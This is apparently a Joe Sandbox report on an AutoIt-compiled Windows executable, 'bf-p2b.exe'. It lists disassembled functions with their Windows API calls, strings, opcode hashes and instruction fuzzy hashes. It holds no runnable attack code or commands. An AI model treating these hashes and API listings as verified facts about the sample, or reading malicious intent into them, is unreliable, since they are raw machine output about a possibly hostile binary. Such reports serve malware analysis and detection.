                          • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$Close___create$Handle__close_nolock__free_osfhnd$ChangeFindNotificationType__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                          • String ID: @
                          • API String ID: 3388700018-2766056989
                          • Opcode ID: b3f223242d890567f1c4bc4ae60075713e542351092ff71b702ef2f28e847540
                          • Instruction ID: 8d5f176e2c36df67b6c3f4e5f617dd32fba2e886df95ef6a075bb656de827f25
                          • Opcode Fuzzy Hash: b3f223242d890567f1c4bc4ae60075713e542351092ff71b702ef2f28e847540
                          • Instruction Fuzzy Hash: 3F221671904215ABEF299F68DC92BAD7BE1EF04320F3482E9E511EB2D1DB358D50CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 00B476ED
                          • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00B47713
                          • _wcscpy.LIBCMT ref: 00B47741
                          • _wcscmp.LIBCMT ref: 00B4774C
                          • _wcscat.LIBCMT ref: 00B47762
                          • _wcsstr.LIBCMT ref: 00B4776D
                          • 74D41560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00B47789
                          • _wcscat.LIBCMT ref: 00B477D2
                          • _wcscat.LIBCMT ref: 00B477D9
                          • _wcsncpy.LIBCMT ref: 00B47804
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcscat$FileInfoVersion$D41560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                          • API String ID: 716990576-1459072770
                          • Opcode ID: 9fb706d879e0562833775081dec6c14e19ef285769e70cd624f6e4279c6f3159
                          • Instruction ID: 74a69f766544d24659ce1d1006d0332170735a308a50d08871df7a33819e93c2
                          • Opcode Fuzzy Hash: 9fb706d879e0562833775081dec6c14e19ef285769e70cd624f6e4279c6f3159
                          • Instruction Fuzzy Hash: 0841F471A44214BADB01B765AC87EBF7BFCEF15710F1000E6F908A71A2EF649A41D7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          • GetForegroundWindow.USER32 ref: 00B01FBE
                          • IsWindow.USER32(?), ref: 00B7282E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$Foreground_memmove
                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                          • API String ID: 3828923867-1919597938
                          • Opcode ID: 76a08f6553bc1f51f20a230c6788f6ec6fd08feae365cef327630fc8022596ec
                          • Instruction ID: 8cc71e07df7f82152a14941b4d25779ca324ee5bea22bb276db32b02373e55ca
                          • Opcode Fuzzy Hash: 76a08f6553bc1f51f20a230c6788f6ec6fd08feae365cef327630fc8022596ec
                          • Instruction Fuzzy Hash: E2D1D730504603EBCB18EF14C481AAABBE1FF54340F548AEDF46A575E1DB31E999CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B63626
                          • RegCreateKeyExW.KERNEL32(?,?,00000000,00B9DBF0,00000000,?,00000000,?,?), ref: 00B63694
                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B636DC
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B63765
                          • RegCloseKey.ADVAPI32(?), ref: 00B63A85
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B63A92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Close$ConnectCreateRegistryValue
                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                          • API String ID: 536824911-966354055
                          • Opcode ID: 3cda39320f0dc3e746c6f5155e8079b710187c17bc3e09090d80f8fa4db6af28
                          • Instruction ID: 4614e1fe5f35612eada5d65d4d6a2756bf4499f4244f76bdc8f2487ff3933f09
                          • Opcode Fuzzy Hash: 3cda39320f0dc3e746c6f5155e8079b710187c17bc3e09090d80f8fa4db6af28
                          • Instruction Fuzzy Hash: 0A024B756006019FCB14EF15C895E2ABBE5FF89720F05859DF88A9B3A2DB34EE41CB41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\bf-p2b.exe,00000104,?,00000000,00000001,00000000), ref: 00B0428C
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                            • Part of subcall function 00B21BC7: __wcsicmp_l.LIBCMT ref: 00B21C50
                          • _wcscpy.LIBCMT ref: 00B043C0
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\bf-p2b.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 00B7214E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\bf-p2b.exe$CMDLINE$CMDLINERAW
                          • API String ID: 861526374-1798614123
                          • Opcode ID: 63820c1a348d72dcf01338c4db8b9215da255a93747d01f6a5c73a02d53c0f15
                          • Instruction ID: dd118457d4c61d7d647fa7c022e7d855a80872fda1e4a6a73d3b516c9843eef1
                          • Opcode Fuzzy Hash: 63820c1a348d72dcf01338c4db8b9215da255a93747d01f6a5c73a02d53c0f15
                          • Instruction Fuzzy Hash: EE81A0B2900119AACB14EBE4DD92EEF7BF8EF15350F5004A9E641B71D2EF706A04CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                          • String ID: 0.0.0.0
                          • API String ID: 208665112-3771769585
                          • Opcode ID: 5757be58d4d5d35809b6c9d9e42c8a1c8c3975fea8ee6cff32db7ea1bd4664db
                          • Instruction ID: b9ec7f478f7fdfe5d20160f3615ab0df341df81514fade766f5e17524daa7d1e
                          • Opcode Fuzzy Hash: 5757be58d4d5d35809b6c9d9e42c8a1c8c3975fea8ee6cff32db7ea1bd4664db
                          • Instruction Fuzzy Hash: 7711D235948125BBDB24A774AC4AEEE77ECEF00720F1000E6F449A60A1EF70DB81D7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B1EA39
                          • __wsplitpath.LIBCMT ref: 00B1EA56
                            • Part of subcall function 00B2297D: __wsplitpath_helper.LIBCMT ref: 00B229BD
                          • _wcsncat.LIBCMT ref: 00B1EA69
                          • __makepath.LIBCMT ref: 00B1EA85
                            • Part of subcall function 00B22BFF: __wmakepath_s.LIBCMT ref: 00B22C13
                            • Part of subcall function 00B2010A: std::exception::exception.LIBCMT ref: 00B2013E
                            • Part of subcall function 00B2010A: __CxxThrowException@8.LIBCMT ref: 00B20153
                          • _wcscpy.LIBCMT ref: 00B1EABE
                            • Part of subcall function 00B1EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00B1EADA,?,?), ref: 00B1EB27
                          • _wcscat.LIBCMT ref: 00B732FC
                          • _wcscat.LIBCMT ref: 00B73334
                          • _wcsncpy.LIBCMT ref: 00B73370
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                          • String ID: Include$\
                          • API String ID: 1213536620-3429789819
                          • Opcode ID: df2e87c22299c68e0686e71283c9be376104f1cc0f83b128de82091ce913350f
                          • Instruction ID: 0021816416d02a23805382c28674e9a039b72e010db08336a59f28e472dafc22
                          • Opcode Fuzzy Hash: df2e87c22299c68e0686e71283c9be376104f1cc0f83b128de82091ce913350f
                          • Instruction Fuzzy Hash: 02513EB24043809FC315EF59EC85C9AB7E8FB8D301B80496EF549D72A1EF749644CB6A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00B030B0
                          • LoadCursorW.USER32(00000000,00007F00), ref: 00B030BF
                          • LoadIconW.USER32(00000063), ref: 00B030D5
                          • LoadIconW.USER32(000000A4), ref: 00B030E7
                          • LoadIconW.USER32(000000A2), ref: 00B030F9
                            • Part of subcall function 00B0318A: LoadImageW.USER32(00B00000,00000063,00000001,00000010,00000010,00000000), ref: 00B031AE
                          • RegisterClassExW.USER32(?), ref: 00B03167
                            • Part of subcall function 00B02F58: GetSysColorBrush.USER32(0000000F), ref: 00B02F8B
                            • Part of subcall function 00B02F58: RegisterClassExW.USER32(00000030), ref: 00B02FB5
                            • Part of subcall function 00B02F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00B02FC6
                            • Part of subcall function 00B02F58: LoadIconW.USER32(000000A9), ref: 00B03009
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                          • String ID: #$0$AutoIt v3
                          • API String ID: 2880975755-4155596026
                          • Opcode ID: 3e2be33421c6c582e16993810ebaf8f6ba15d60231abff2371219c680183295b
                          • Instruction ID: 6e7024a64a8369fd2178a3bca41c646144dfb7af597a66094cccad07d4f7be91
                          • Opcode Fuzzy Hash: 3e2be33421c6c582e16993810ebaf8f6ba15d60231abff2371219c680183295b
                          • Instruction Fuzzy Hash: 112139B4D00304AFCB009FA9EC49E99BFF5FB4D310F14892AE614B32A1DB7449448B91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00B02F8B
                          • RegisterClassExW.USER32(00000030), ref: 00B02FB5
                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00B02FC6
                          • LoadIconW.USER32(000000A9), ref: 00B03009
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Register$BrushClassClipboardColorFormatIconLoad
                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                          • API String ID: 975902462-1005189915
                          • Opcode ID: bfa7c8e7bf3058a1dd4bae2f22a8196a6268e725249f47e8582f8e04b003e203
                          • Instruction ID: 14788e7bbafbb476c925974ad6bbe3caa1f90f4ad5a9c35a1b733f68ea690edd
                          • Opcode Fuzzy Hash: bfa7c8e7bf3058a1dd4bae2f22a8196a6268e725249f47e8582f8e04b003e203
                          • Instruction Fuzzy Hash: 7921BFB5904318AFDB009FA8E889BCEBBF4FB09700F10461AF615B72A0DBB04544CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • _memset.LIBCMT ref: 00B623E6
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B62579
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B6259D
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B625DD
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B625FF
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B62760
                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00B62792
                          • CloseHandle.KERNEL32(?), ref: 00B627C1
                          • CloseHandle.KERNEL32(?), ref: 00B62838
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                          • String ID:
                          • API String ID: 4090791747-0
                          • Opcode ID: c658f99f385f677bdc0fa2d4f876d847ab8dae6e73683527575477d4efb6cb7e
                          • Instruction ID: af2795c2773f62613d2548ee76ffae5fc818b15ff6d771f5d95ba80ab4fe3686
                          • Opcode Fuzzy Hash: c658f99f385f677bdc0fa2d4f876d847ab8dae6e73683527575477d4efb6cb7e
                          • Instruction Fuzzy Hash: 8ED1B035604701DFDB24EF24D891A6ABBE1EF84314F1885ADF8899B3A2DB34DD41CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID: NULL Pointer assignment$Not an Object type
                          • API String ID: 0-572801152
                          • Opcode ID: 5a81e1024204dcd4e3083b431f38bffe063186583b1efeebc4fe2b539162c041
                          • Instruction ID: 157188ce0f3dbbc4c5e5799f54e98bead6fed0c5ca7e907c1dcc4bcaf665f6e2
                          • Opcode Fuzzy Hash: 5a81e1024204dcd4e3083b431f38bffe063186583b1efeebc4fe2b539162c041
                          • Instruction Fuzzy Hash: EBE18F71A00319AFDF10DFA8D881BAE7BF6EB48355F1480E9ED45AB281D7709D49CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$_memset
                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                          • API String ID: 2862541840-625585964
                          • Opcode ID: 5f19bed3518b5fc8ba833ae2382804fbca793cddb9907049778a2f9ac3bcecf4
                          • Instruction ID: 1db5963cfffc6722e842bd29d3582a537f850d9407450f5159056ab9211c39a2
                          • Opcode Fuzzy Hash: 5f19bed3518b5fc8ba833ae2382804fbca793cddb9907049778a2f9ac3bcecf4
                          • Instruction Fuzzy Hash: EC918A71A00319AFCB24DFA4C884FAEBBF9EF44711F1481D9E915AB281D7709949CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00B5B777
                          • CoInitialize.OLE32(00000000), ref: 00B5B7A4
                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00B5B8AE
                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00B5B9DB
                          • CoGetObject.OLE32(?,00000000,00B8D91C,?), ref: 00B5BA32
                          • SetErrorMode.KERNEL32(00000000), ref: 00B5BA45
                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B5BAC5
                          • VariantClear.OLEAUT32(00B8D91C), ref: 00B5BAD5
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorMode$ObjectVariant$ClearInitInitializeRunningTable
                          • String ID:
                          • API String ID: 2437601815-0
                          • Opcode ID: 78c0effef61609dd94e0c97bc21acbf7c2069ebd5c89043dce558ec04c17caab
                          • Instruction ID: 2f947f109119e484382f3001f9ccf12c6d51330b7c054ef3f90dd99cd044521a
                          • Opcode Fuzzy Hash: 78c0effef61609dd94e0c97bc21acbf7c2069ebd5c89043dce558ec04c17caab
                          • Instruction Fuzzy Hash: E9C104716043059FC700EF68C884A6BBBE9FF88315F14499DF9899B261DB71ED09CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00B1EADA,?,?), ref: 00B1EB27
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,00B1EADA,?,?), ref: 00B74B26
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,00B1EADA,?,?), ref: 00B74B65
                          • RegCloseKey.ADVAPI32(?,?,00B1EADA,?,?), ref: 00B74B94
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: QueryValue$CloseOpen
                          • String ID: Include$Software\AutoIt v3\AutoIt
                          • API String ID: 1586453840-614718249
                          • Opcode ID: 883767dde83fcefc91db745f639e080021009aab5737281d70314c8be245586c
                          • Instruction ID: da668384e413e3924d69136e9d0959e9b8aac4f5650d6aa7d4991c81e7930cd4
                          • Opcode Fuzzy Hash: 883767dde83fcefc91db745f639e080021009aab5737281d70314c8be245586c
                          • Instruction Fuzzy Hash: 49116A71A04109BEEB05ABA4CC96EBE7BBCEF04354F1040A9B506E71A1EB70AE01DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00B02ECB
                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B02EEC
                          • ShowWindow.USER32(00000000), ref: 00B02F00
                          • ShowWindow.USER32(00000000), ref: 00B02F09
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
